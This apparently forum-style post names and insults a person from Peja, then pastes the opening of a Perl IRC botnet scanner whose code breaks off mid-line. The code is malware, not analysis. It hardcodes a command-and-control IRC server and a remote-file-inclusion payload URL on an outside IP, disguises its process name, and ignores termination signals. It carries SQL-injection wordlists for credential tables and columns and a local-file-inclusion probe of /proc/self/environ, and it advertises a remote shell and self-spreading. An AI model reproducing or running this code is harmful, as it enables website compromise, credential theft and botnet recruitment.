There is a mistake in hosting adress Serbia must be Kosova because this botnet is hosted in Kosova indipendent Nation
Here is the scaner used by Lindi a litle idiot from peja:
#!/usr/bin/perl $powered="BaMbY"; $mail="admin(at)bamby.web.id"; ##################################################################################### ## ## ## 17/06/2010 ## ## Author : BaMbY, Voo_Doo ## ## Team : Irc.Byroe.Net ## ## ## ## ## IMPORTANT ## ## ## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ## ## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ## ## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR ## ## # SYSTEM MORE SECURE. ## ## ## ## ## ## ## Features: ## ## [+]e107 Injection Scanner ## ## [+]Sql Injection Scanner ## ## [+]XML (Extensible Markup Language) Injection Scanner ## ## [+]Remote File Inclusion Scanner ## ## [+]Local File Inclusion Scanner ## ## [+]Integrated Shell, so you can execute commands on the server ## ## [+]Spread Mode, to activate or disable Spread Function ## ## ## ##################################################################################### use HTTP::Request; use LWP::UserAgent; use IO::Socket; use IO::Select; use IO::Socket::INET; use Socket; use HTTP::Request::Common; use LWP::Simple; use LWP 5.64; use HTTP::Request::Common qw(POST); use Digest::MD5 qw(md5_hex); use MIME::Base64; my $fakeproc = "/usr/ath-crew/hacked -k /start/scanner/ath-version/0.1"; $ircserver = "82.114.86.210"; my $ircport = "6667"; my $nickname = "Scanner[LL2]"; my $ident = "2ATH"; my $channel = "#0ATH"; my $runner = "Lindi_Cracker"; my $fullname = 'ATH Multi Scanner!'; my $lfi = "!lfi"; my $xml = "!xml"; my $e107 = "!e107"; my $sql = "!sql"; my $rfi = "!rfi"; my $cmdlfi = "!cmdlfi"; my $cmde107 = "!cmde107"; my $cmdxml = "!cmdxml"; my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ"; my $rfiid = "http://82.114.86.210/raw.txt?"; my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario', 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator', 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names', 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address', 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass', 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id', 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member', 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts', 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors', 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO'); my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email', 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail', 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author', 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo', 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors', 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username'); $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; chdir("/tmp"); $ircserver="$ARGV[0]" if $ARGV[0]; $0 = "$fakeproc"."